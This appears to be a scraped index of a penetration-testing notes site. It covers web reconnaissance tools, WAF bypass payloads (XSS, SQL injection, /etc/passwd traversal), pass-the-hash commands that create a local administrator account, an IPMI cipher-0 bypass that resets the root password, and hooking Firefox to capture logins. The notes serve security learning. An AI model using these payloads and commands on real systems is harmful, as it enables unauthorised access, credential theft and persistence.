    Crawling is the process of navigating around the web application, following links, submitting forms and logging in (where possible) with the objective of mapping out and cataloging the web application and the navigational paths within it.

    Crawling is typically passive as engagement with the target is done via what is publicly accessible, we can utilize Burp Suite\u2019s passive crawler to help us map out the web application to better understand how it is setup and how it works.

    BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

    OWASP Zap has both Spider and Crawler features available.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#2-active-information-gathering","title":"2. Active information gathering","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#21-enumerate-applications-and-services-on-webserver","title":"2.1. Enumerate applications and services on Webserver","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

    ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

    Hostname discovery

    nmap --script smb-os-discovery $ip\n

    Scanning the IP looking for services:

    nmap -sV -sC -- <target>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#22-web-server-fingerprinting","title":"2.2. Web Server Fingerprinting","text":"

    OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

    ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#http-headers-and-source-code","title":"HTTP headers and source code","text":"

    HTTP headers and HTML Source code (with Burpsuite and curl). Or CRTL-u on the browser to see the source code.

    • Note the response header Server, X-Powered-By, or X-Generator as well.
    • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
    • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_2","title":"nmap","text":"

    Conduct an scan

    nmap -sV -F target\n

    If a server version found is potentially vulnerable, use searchsploit:

    searchsploit apache 2.4.18\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#metasploit","title":"metasploit","text":"

    Additionally you can use metasploit:

    use auxiliary/scanner/http_version\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#whatweb_1","title":"whatweb","text":"

    whatweb.

    # version of web servers, supporting frameworks, and applications\nwhatweb $ip\nwhatweb <hostname>\n\n# Automate web application enumeration across a network.\nwhatweb --no-errors $ip/24\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nikto","title":"Nikto","text":"

    nikto.

    nikto -h domain.com -o nikto.html -Format html\n\n\nnikto -h http://domain.com/index.php?page=target-page.php -Tuning 5 -Display V\n# -Display V : turn verbose mode on\n# -Tuning 5 : Level 5 is considered aggressive, covering a wide range of tests but may also increase the likelihood of false positives. \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#23-directoryfile-enumeration","title":"2.3. Directory/File enumeration","text":"","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_3","title":"nmap","text":"
    nmap -sV -p80 --script=http-enum <target>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dirb","title":"dirb","text":"

    Cheat sheet with dirb.

    dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster","title":"gobuster","text":"

    Gobuster:

    gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,4.4 -x .php,.txt -r \n# -b: exclude from results an specific http response`\n# -r: follow redirects\n# -x: add to the path provided by dictionary these extensions\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#ffuf","title":"Ffuf","text":"

    Ffuf:

    ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz","title":"Wfuzz","text":"

    Wfuzz

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#feroxbuster","title":"feroxbuster","text":"

    feroxbuster

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#amass","title":"amass","text":"

    amass

    amass enum -active -d crapi.apisec.ai  -ip -brute -dir path/to/save/results/\n# enum: Perform enumerations and network mapping\n# -active: Attempt zone transfer and certificate name grabs, among others.\n# -ip: Show ip addresses of cached subdomais.\n# -brute: Perform a brute force dns attack.\n\namass enum -passive -d crapi.apisec.ai -src  -dir path/to/save/results/\n# enum: Perform enumerations and network mapping.\n# -pasive: Performs passive scan\n# src: display sources of the host domain.\n# -dir: Specify a folder to save results.\n\namass intel -d crapi.apisec.ai\n# intel: Discover targets for enumerations. It actively automate active enumeration. \n

    Some flags:

    -active: Attempt zone transfer and certificate name grabs.\n-pasive: Passive fingerprinting.\n-bl: Blacklist of subdomain names that will not be investigated\n-d: to specify a domain\n-ip: Show ip addresses of cached subdomais.\n\u2013include-unresolvable: output DNS names that did not resolve.\n-o file.txt: To output the result into a file\n-w: path to a different wordlist file\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#spidering-with-owasp-zap","title":"Spidering with OWASP ZAP","text":"

    Spidering is an active technique. It's the process of automatically discovering new resources (URLs) on a web application/site. It typically begins with a list of target URLs called seeds, after which the spider will visit the URLs and identified hyperlinks in the page and adds them to the list of URLs to visit and repeats the process recursively.

    Spidering can be quite loud and as a result, it is typically considered to be an active information gathering technique.

    We can utilize OWASP ZAP\u2019s Spider to automate the process of spidering a web application to map out the web application and learn more about how the site is laid out and how it works.

    BurpSuite Community edition has only Crawler feature available. For spidering, you need Pro edition.

    OWASP Zap has both Spider and Crawler features available.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#24-active-dns-enumeration","title":"2.4. Active DNS enumeration","text":"

    Domain Name System (DNS) is a protocol that is used to resolve domain names/hostnames to IP addresses. During the early days of the internet, users would have to remember the IP addresses of the sites that they wanted to visit, DNS resolves this issue by mapping domain names (easier to recall) to their respective IP addresses.

    A DNS server (nameserver) is like a telephone directory that contains domain names and their corresponding IP addresses. A plethora of public DNS servers have been set up by companies like Cloudflare (1.1.1.1) and Google (8.8.8.8). These DNS servers contain the records of almost all domains on the internet.

    DNS interrogation is the process of enumerating DNS records for a specific domain. The objective of DNS interrogation is to probe a DNS server to provide us with DNS records for a specific domain. This process can provide us with important information like the IP address of a domain, subdomains, mail server addresses etc.

    More about DNS enumeration.

    Tool + Cheat sheet What it does dnsenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. dig discover non-contiguous ip blocks. fierce DNS scanner that helps locate non-contiguous IP space and hostnames. dnscan Python wordlist-based DNS subdomain scanner. gobuster For brute force enumerations. nslookup . amass In depth DNS Enumeration and network mapping.","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum","title":"dnsenum","text":"

    dnsenum Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. Used for active fingerprinting:

    dnsenum domain.com\n

    One cool thing about dnsenum is that it can perform dns transfer zone, like [dig]](dig.md). dnsenum performs DNS brute force with /usr/share/dnsenum/dns.txt.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dig","title":"dig","text":"

    Additionally, see dig axfr.

    dig (More complete cheat sheet: dig)

    #Syntax for dns transferring a zone\ndig axfr @nameserver example.com\n\n# Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce","title":"Fierce","text":"

    Fierce (More complete cheat sheet: fierce)

    # Perform a dns transfer using a wordlist againts domain.com\nfierce -dns domain.com \n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnscan","title":"DNScan","text":"

    DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

    dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_1","title":"gobuster","text":"

    gobuster (More complete cheat sheet: gobuster)

    gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nslookup","title":"nslookup","text":"

    nslookup (More complete cheat sheet: nslookup)

    # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#25-subdomain-enumeration","title":"2.5. Subdomain enumeration","text":"

    Using Sec wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sublist3r","title":"Sublist3r","text":"

    Sublist3r enumerates ubdomains using many search engines such as Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft, Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS. Easily blocked by Google.

    python3 sublist3r.py -d example.com -o file.txt\n# -d: Specify the domain.\n# -o file.txt: It prints the results to a file\n# -b: Enable the bruteforce module. This built-in module relies on the names.txt wordlist. To find it, use: locate names.txt (you can edit it).\n\n# Select an engine for enumeration, for instance, google.\npython3 sublist3r.py -d example.com -e google\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#fierce_1","title":"fierce","text":"
    # Brute force subdomains with a seclist\nfierce --domain domain.com --subdomain-file fierce-hostlist.txt\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#gobuster_2","title":"gobuster","text":"

    Gobuster:

    gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#wfuzz_1","title":"wfuzz","text":"

    Wfuzz:

    wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# \u2013hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist \n# -H \u201cHost: FUZZ.nunchucks.htb\u201d: Header. Also with \"FUZZ\" we indicate the injection point for payloads\n# \u2013hl 546: Filter out responses with a specific number of lines. In this case, 546\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#dnsenum_1","title":"dnsenum","text":"

    Using dnsenum.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#bash-script-with-dig-and-seclist","title":"Bash script with dig and seclist","text":"

    Bash script, using Sec wordlist:

    for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-vhost-enumeration","title":"2.6. VHOST enumeration","text":"

    A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

    There are two ways to configure virtual hosts:

    • IP-based virtual hosting
    • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.

    vHost Fuzzing

    # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

    vHost Fuzzing with ffuf:

    # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#26-certificate-enumeration","title":"2.6. Certificate enumeration","text":"

    SSL/TLS certificates are another potentially valuable source of information if HTTPS is in use (for instance, in gathering information to prepare a phising attack).

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#sslyze-and-sslabs","title":"sslyze and sslabs","text":"

    For this we can use: - sslyze - ssllabs by Qalys - https://ciphersuite.info.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#nmap_4","title":"nmap","text":"

    Also, you can use a script for nmap:

    nmap --script ssl-enum-ciphers <HOSTNAME>\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#virustotal","title":"virustotal","text":"

    virustotal.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#crtsh-with-curl","title":"crt.sh with curl","text":"

    crt.sh: it enables the verification of issued digital certificates for encrypted Internet connections. This is intended to enable the detection of false or maliciously issued certificates for a domain.

    # Get all subdomais with that digital certificate\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq .\n\n# Filter all by unique subdomain\ncurl -s https://crt.sh/\\?q\\=example.com\\&output\\=json | jq . | grep name | cut -d\":\" -f2 | grep -v \"CN=\" | cut -d'\"' -f2 | awk '{gsub(/\\\\n/,\"\\n\");}1;' | sort -u\n\n# With the list of unique subdomains, list all the Company hosted servers\nfor i in $(cat subdomainlist);do host $i | grep \"has address\" | grep example.com | cut -d\" \" -f4 >> ip-addresses.txt;done\n\ncurl -s \"https://crt.sh/?q=${TARGET}&output=json\" | jq -r '.[] | \"\\(.name_value)\\n\\(.common_name)\"' | sort -u > \"${TARGET}_crt.sh.txt\"\n# curl -s: Issue the request with minimal output.\n# https://crt.sh/?q=<DOMAIN>&output=json: Ask for the json output.\n# jq -r '.[]' \"\\(.name_value)\\n\\(.common_name)\"': Process the json output and print certificate's name value and common name one per line.\n# sort -u: Sort alphabetically the output provided and removes duplicates.\n\n# We also can manually perform this operation against a target using OpenSSL via:\nopenssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\\r\\n\\r' -connect \"${TARGET}:${PORT}\" | openssl x509 -noout -text -in - | grep 'DNS' | sed -e 's|DNS:|\\n|g' -e 's|^\\*.*||g' | tr -d ',' | sort -u\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#censysio","title":"censys.io","text":"

    https://censys.io: We can navigate to https://search.censys.io/certificates or https://crt.sh and introduce the domain name of our target organization to start discovering new subdomains.

    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#the-harvester","title":"The Harvester","text":"

    The Harvester: simple-to-use yet powerful and effective tool for early-stage penetration testing and red team engagements. We can use it to gather information to help identify a company's attack surface. The tool collects emails, names, subdomains, IP addresses, and URLs from various public data sources for passive information gathering. It has modules.

    Automate the modules we want to launch:

    1. Create a list of sources, one per line, sources.txt.

    2. Execute:

     cat sources.txt | while read source; do theHarvester -d \"${TARGET}\" -b $source -f \"${source}_${TARGET}\";done\n

    3. When the process finishes, extract all the subdomains found and sort them:

    cat *.json | jq -r '.hosts[]' 2>/dev/null | cut -d':' -f 1 | sort -u > \"${TARGET}_theHarvester.txt\"\n

    4. Merge all the passive reconnaissance files:

    cat facebook.com_*.txt | sort -u > facebook.com_subdomains_passive.txt\n$ cat facebook.com_subdomains_passive.txt | wc -l\n
    ","tags":["pentest","information gathering","web"]},{"location":"information-gathering/#shodan_1","title":"Shodan","text":"

    Shodan: Once we see which hosts can be investigated further, we can generate a list of IP addresses with a minor adjustment to the cut command and run them through Shodan.

    for i in $(cat ip-addresses.txt);do shodan host $i;done\n

    With this we'll get an IP list, that we can use to search for DNS records.

    ","tags":["pentest","information gathering","web"]},{"location":"inmunity-debugger/","title":"Inmunity Debugger","text":"","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#installation","title":"Installation","text":"

    https://www.immunityinc.com/products/debugger/

    ","tags":["python","python pentesting","tools"]},{"location":"inmunity-debugger/#firefox-api-hooking-with-inmunity-debugger","title":"Firefox API hooking with Inmunity Debugger","text":"

    Firefox uses a function called PR_Write inside a dll module called nss3.dll to write/submit data. So once the target enters his username and password and click on login button the fireforx process will call PR_Write function from nss3.dll module, if we setup a break point at that function we should see the data in clear text.

    Reference:- https://developer.mozilla.org/en-docs/Mozilla/Projects/NSPR/Reference/PR_Write

    ","tags":["python","python pentesting","tools"]},{"location":"input-filtering/","title":"Input filtering","text":"

    Input Filtering involves validating and sanitizing data received by the web application from users or external sources. Input filtering helps prevent security vulnerabilities such as SQL injection, cross-site scripting (XSS), and command injection. Some common techniques for input filtering include data validation, input validation, and input sanitization:

    • Data Validation: Data validation checks whether the incoming data conforms to expected formats and constraints. Example: an email field.
    • Input Validation: Input validation goes a step further by not only checking data formats but also assessing data for potential security threats. It detects and rejects input that could be used for attacks, such as SQL injection payloads or malicious scripts.
    • Input Sanitization: Input sanitization involves cleaning or escaping input data to remove or neutralize potentially dangerous characters or content.
    "},{"location":"input-filtering/#input-filtering-techniques","title":"Input filtering techniques","text":"
    • Content Security Policy (CSP): CSP is a security feature that controls which sources of content are allowed to be loaded by a web page. It helps prevent XSS attacks by specifying which domains are permitted sources for scripts, styles, images, and other resources.
    • Cross-Site Request Forgery (CSRF) Protection: Filtering mechanisms can be used to implement CSRF protection, ensuring that incoming requests have valid anti-CSRF tokens to prevent attackers from tricking users into performing actions they didn't intend.
    • Web Application Firewalls (WAFs): WAFs are security appliances or services that filter incoming HTTP requests to a web application. They use predefined rules and heuristics to detect and block malicious traffic.
    • Regular Expression Filtering: Regular expressions (regex) can be used to filter and validate data against complex patterns. However, improper regex usage can introduce security vulnerabilities, so careful crafting and testing of regex patterns are necessary.
    "},{"location":"input-filtering/#evasion-techniques","title":"Evasion techniques","text":"

    Web application defense mechanisms are proactive tools and techniques designed to protect and defend web applications against various security threats and vulnerabilities.

    Evasion in web application security testing refers to the practice of using various techniques and methods to bypass or circumvent security mechanisms and controls put in place to protect a web application.

    "},{"location":"input-filtering/#bypass-what","title":"Bypass what!","text":"
    • Authentication: Authentication mechanisms verify the identity of users and ensure that they have the appropriate permissions to access specific resources within the application. Common authentication methods include username and password, multi-factor authentication (MFA), and biometrics.
    • Authorization: Authorization mechanisms determine what actions and resources users are allowed to access within the application once they have been authenticated. This includes defining roles, permissions, and access controls.
    • Input Validation/Filtering: Input validation is the process of verifying and sanitizing data received from users or external sources to prevent malicious input that could lead to vulnerabilities like SQL injection, cross-site scripting (XSS), or command injection.
    • Session Management: Session management mechanisms are responsible for creating, managing, and securing user sessions. They include measures like session timeouts, secure session tokens, and protection against session fixation attacks.
    • Cross-Site Request Forgery (CSRF) Protection: CSRF protection mechanisms prevent attackers from tricking users into making unauthorized requests to the application on their behalf. Tokens and anti-CSRF measures are often used for this purpose.
    • Security Headers: HTTP security headers like Content Security Policy (CSP), X-Content-Type-Options, and X-Frame-Options are used to control how web browsers should handle various aspects of web page security and rendering.
    • Rate Limiting: Rate limiting mechanisms restrict the number of requests a user or IP address can make to the application within a specific time frame. This helps prevent brute force attacks and DDoS attempts.
    • Web Application Firewalls (WAFs): WAFs are security appliances or software solutions that sit between the web application and the client to monitor and filter incoming traffic. They can detect and block common web application attacks, such as SQL injection, cross-site scripting (XSS), and application-layer DDoS attacks.
    • Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS): IDS and IPS solutions inspect network and application traffic for signs of suspicious or malicious activity. IDS detects and alerts on potential threats, while IPS can take proactive measures to block or prevent malicious traffic.
    • Proxies: In the context of web applications, proxies refer to intermediary servers that facilitate communication between a user's browser and the web server hosting the application. These proxies can serve various purposes, ranging from enhancing security and privacy to optimizing performance and managing network traffic.
    "},{"location":"input-filtering/#bypass-how","title":"Bypass how!","text":"
    • Bypassing Web Application Firewalls (WAFs)/Proxy Rules: WAFs and proxies are designed to filter out malicious requests and prevent attacks like SQL injection or cross-site scripting (XSS). Evasion techniques may involve encoding, obfuscation, or fragmentation of malicious payloads to bypass the WAF's detection rules.
    • Evading Intrusion Detection Systems (IDS): IDS systems monitor network traffic for signs of malicious activity. Evasion techniques can be used to hide or modify the payload of an attack so that it goes undetected by the IDS.
    "},{"location":"input-filtering/#solutions-for-implementing-input-filtering","title":"Solutions for implementing input filtering","text":"

    WAFs. An well known open source solution is ModSecurity. WAFs use rules to indicate what a filter must block or allow. These rules use Regular Expressions (RE or RegEx).

    See notes on regex.

    The best solution for protecting a webapp is whitelisting. But blacklisting methods are commonly found in deployments. Blacklisting includes a collection of well-known attacks. There are WAF bypasses.

    "},{"location":"input-filtering/#waf-bypasses","title":"WAF bypasses","text":"
    ################\n# XSS: alert('xss') and alert(1)\n################\nprompt('xss')\nprompt(8)\nconfirm('xss')\nconfirm(8)\nalert(/xss/.source)\nwindow[/alert/.source](8)\n\n################\n# XSS: alert(document.cookie)\n################\nwith(document)alert(cookie)\nalert(document['cookie'])\nalert(document[/cookie/.source])\nalert(document[(/coo/.source+/kie/.source])\n\n################\n# XSS: <img src=x onerror=alert(1);>\n################\n<svg/onload=alert(1)>\n<video src=x onerror=alert(1);>\n<audio src=x onerror=alert(1);>\n\n\n################\n# XSS: javascript:alert(document.cookie)\n################\ndata:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=\n
    ################\n# Blind SQL injection: 'or 1=1\n################\n' or 6=6\n' or 0x47=0x47\nor char(32)=''\nor 6 is not null\n\n################\n# Blind SQL injection: 'or 1=1\n################\n\nUNION ALL SELECT\n
    ################\n#  Directory Traversals: /etc/passwd\n################\n/too/../etc/far/../passwd\n/etc//passwd\n/etc/ignore/../passwd\n/etc/passwd.......\n
    ################\n#  Webshells: c99.php, r57.php, shell.aspx, cmd.jsp, CmdAsp.asp\n################\naugh.php\n
    "},{"location":"input-filtering/#fingerprinting-a-waf","title":"Fingerprinting a WAF","text":"

    Tools: wafw00f and nmap script:

    nmap -p 80 -script http-waf-detect $ip \nnmap -p 80 -script http-waf-fingerprint $ip \n

    Detecting a WAF manually

    1. Cookies: Via cookie values.

    WAF Cookie value Citrix netscaler ns_af, citrix_ns_id, NSC_ F5 BIG-IP ASM TS followed by a string with the regex:^TS[a-zA-Z0-9]{3,6} Barracuda barra_counter_session, BNi__BARRACUDA_LB_COOKIE

    2. Server cloaking: WAFs can rewrite Server header to deceive attackers.

    3. Response codes: WAFs can also modify the HTTP response codes if the request is hostile.

    4. WAFs can be displayed in response bodies, like for instance mod_security, AQTRONIX WebKnight, dotDefender.

    5. Drop Action: WAFs can close the connections in the case they detect a malicious request.

    "},{"location":"input-filtering/#client-side-filters","title":"Client-side filters","text":""},{"location":"input-filtering/#firefox","title":"Firefox","text":"

    Browser addons such as NoScript is a whitelist-based security tool that basically disables all the executable web content (javascript, java, flash, silverlight...) and lets the user choose which sites are \"trusted\". Nice feature: anti-XSS protection.

    "},{"location":"input-filtering/#internet-explorer","title":"Internet explorer","text":"

    Internet Explorer, XSS Filter, which modifies reflected values in the following way:

    # This payload\n<svg/onload=alert(1)>\n# is transformed to\n<svg/#nload=alert(1)>\n

    XSS Filter is enabled by default in the Internet but websites that want to opt-out of this protection can use the following response header:

    X-XSS-Protection:0\n

    Later on the Internet Explorer team introduced a new directive in the X-XSS-Protection header:

    X-XSS-Protection:1; mode=block\n

    With this directive, if a potential XSS attack is detected, the browser, rather than attempting to sanitize the page, will render a simple #. This directive has been implemented in other browsers.

    "},{"location":"input-filtering/#chrome","title":"Chrome","text":"

    Chrome has XSS Auditor. XSS Auditor is between the HTML Parser and the JS engine.

    The filter analyzes both the inbound requests and the outbound. If executable code is found within the response, then it stops the script and generates a console alert.

    "},{"location":"interactsh/","title":"Interactsh - An alternative to BurpSuite Collaborator","text":"

    Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions.

    Website version: https://app.interactsh.com/

    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#installation","title":"Installation","text":"

    Download from: https://github.com/projectdiscovery/interactsh/

    go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest\n
    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#basic-usage","title":"Basic Usage","text":"
    interactsh-client   \n

    Cry for help:

    interactsh-client  -h\n

    Interactsh server runs multiple services and captures all the incoming requests. To host an instance of interactsh-server, you are required to setup:

    1. Domain name with custom host names and nameservers.
    2. Basic droplet running 24/7 in the background.
    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"interactsh/#burpsuite-integrated","title":"Burpsuite integrated","text":"

    interactsh-collaborator is Burp Suite extension developed and maintained by @wdahlenb

    ","tags":["web pentesting","proxy","servers","burpsuite","tools"]},{"location":"invoke-the-hash/","title":"Invoke-TheHash","text":"

    Collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#installation","title":"Installation","text":"

    Download Powershell Invoke-TheHash fuctions from github repo:https://github.com/Kevin-Robertson/Invoke-TheHash.

    When using Invoke-TheHash, we have two options: SMB or WMI command execution.

    cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
    Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check to see if the username and hash have access to WMI on the target.\n# we can execute `Invoke-TheHash` to execute our PowerShell reverse shell script in the target computer.\n

    How to generate a reverse shell.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"invoke-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
    Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

    How to generate a reverse shell.

    ","tags":["windows","dump hashes","passwords","pass the hash attack"]},{"location":"ipmitool/","title":"IPMItool","text":"","tags":["pentesting","port 623","ipmi"]},{"location":"ipmitool/#ipmi-authentication-bypass-via-cipher-0","title":"IPMI Authentication Bypass via Cipher 0","text":"

    Dan Farmer identified a serious failing of the IPMI 2.0 specification, namely that cipher type 0, an indicator that the client wants to use clear-text authentication, actually allows access with any password. Cipher 0 issues were identified in HP, Dell, and Supermicro BMCs, with the issue likely encompassing all IPMI 2.0 implementations.

    use auxiliary/scanner/ipmi/ipmi_cipher_zero\n

    Abuse this flaw with ipmitool:

    # Install\napt-get install ipmitool \n\n# Use Cipher 0 to dump a list of users. With -C 0 any password is accepted\nipmitool -I lanplus -C 0 -H  $ip -U root -P root user list \n\n# Change the password of root\nipmitool -I lanplus -C 0 -H $ip -U root -P root user set password 2 abc123 \n
    ","tags":["pentesting","port 623","ipmi"]},{"location":"jaws/","title":"JAWS - Just Another Windows (Enum) Script","text":"","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#installation","title":"Installation","text":"

    Github repo: https://github.com/411Hall/JAWS.

    ","tags":["pentesting","windows pentesting","enumeration"]},{"location":"jaws/#basis-usage","title":"Basis usage","text":"

    Run from within CMD shell and write out to file.

    CMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt\n

